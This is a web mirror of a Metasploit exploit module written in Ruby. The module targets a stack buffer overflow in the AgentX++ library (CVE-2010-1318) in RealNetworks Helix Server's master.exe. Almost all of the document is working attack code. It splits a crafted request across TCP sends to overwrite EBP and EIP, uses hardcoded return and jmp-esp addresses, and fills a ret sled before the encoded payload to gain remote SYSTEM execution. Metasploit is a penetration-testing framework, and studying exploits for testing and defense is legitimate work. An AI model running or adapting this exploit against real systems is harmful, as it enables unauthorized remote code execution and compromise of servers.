Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/agentxpp_receive_agentx.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  # include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',

17
        'Description' => %q{

18
          This exploits a stack buffer overflow in the AgentX++ library, as used by

19
          various applications. By sending a specially crafted request, an attacker can

20
          execute arbitrary code, potentially with SYSTEM privileges.

21


22
          This module was tested successfully against master.exe as included with Real

23
          Network\'s Helix Server v12. When installed as a service with Helix Server,

24
          the service runs as SYSTEM, has no recovery action, but will start automatically

25
          on boot.

26


27
          This module does not work with NX/XD enabled but could be modified easily to

28
          do so. The address

29
        },

30
        'Author' => [ 'jduck' ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          [ 'CVE', '2010-1318' ],

34
          [ 'OSVDB', '63919'],

35
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]

36
        ],

37
        'Privileged' => true,

38
        'DefaultOptions' => {

39
          # 'EXITFUNC' => 'seh',

40
        },

41
        'Payload' => {

42
          'Space' => 1024, # plenty of space

43
          'BadChars' => "", # none!

44
          'DisableNops' => true,

45
          'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"

46
        },

47
        'Platform' => 'win',

48
        'Targets' => [

49
          [

50
            'Helix Server v12 and v13 - master.exe',

51
            {

52
              # The BufAddr varies :-/

53
              # 'BufAddr' => 0xea3800,

54
              'BufAddr' => 0x1053880,

55
              'BufSize' => 25000, # If this is too large, the buf is unmapped on free

56
              'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe

57
              'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll

58
            }

59
          ]

60
        ],

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '2010-04-16',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70


71
    register_options([Opt::RPORT(705)])

72
  end

73


74
  def exploit

75
    print_status("Trying target #{target.name}...")

76


77
    connect

78
    print_status("Triggering the vulnerability... Cross your fingers!")

79


80
    num = target['BufSize']

81
    num_str = [num].pack('N')

82


83
    # First send 19 bytes to almost fill the buffer...

84
    hdr = ''

85
    hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')

86
    hdr << rand_text(16 - hdr.length)

87
    # hdr << "QQQQRRRRSSSS"

88
    hdr << num_str[0, 3]

89
    sock.put(hdr)

90


91
    # Wait to make sure it processed that chunk.

92
    select(nil, nil, nil, 0.5)

93
    # print_status("press enter to trigger..."); x = $stdin.gets

94


95
    # Send the rest (smashed!)

96
    hdr = ''

97
    hdr << num_str[3, 1]

98


99
    # NOTE: this stuff is extra, but doesn't count towards the payload..

100
    hdr << rand_text(8)

101
    # hdr << "EEEEFFFF"

102


103
    # becomes ebp

104
    # hdr << "\xeb" * 4

105
    base = target['BufAddr']

106
    new_ebp = base + (num / 2)

107
    if (mod4 = (num % 4)) > 0

108
      # align to 4 bytes

109
      new_ebp += (4 - mod4)

110
    end

111
    hdr << [new_ebp].pack('V')

112


113
    # becomes eip

114
    # hdr << "\xef\xbe\xad\xde"

115
    hdr << [target.ret].pack('V')

116


117
    # NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun

118
    sock.put(hdr)

119


120
    # Send the data that we said we would...

121
    stack = []

122
    stack << target['JmpEsp']

123


124
    num_rets = (num - payload.encoded.length - 4) / 4

125
    num_rets.times {

126
      # points to ret instruction

127
      stack.unshift(target.ret + 3)

128
    }

129


130
    stack = stack.pack('V*')

131
    stack << payload.encoded

132
    # make sure we have all the bytes, or we wont reach the path we want.

133
    stack << rand_text(num - stack.length)

134


135
    sock.put(stack)

136


137
    handler

138
    disconnect

139
  end

140
end

141


142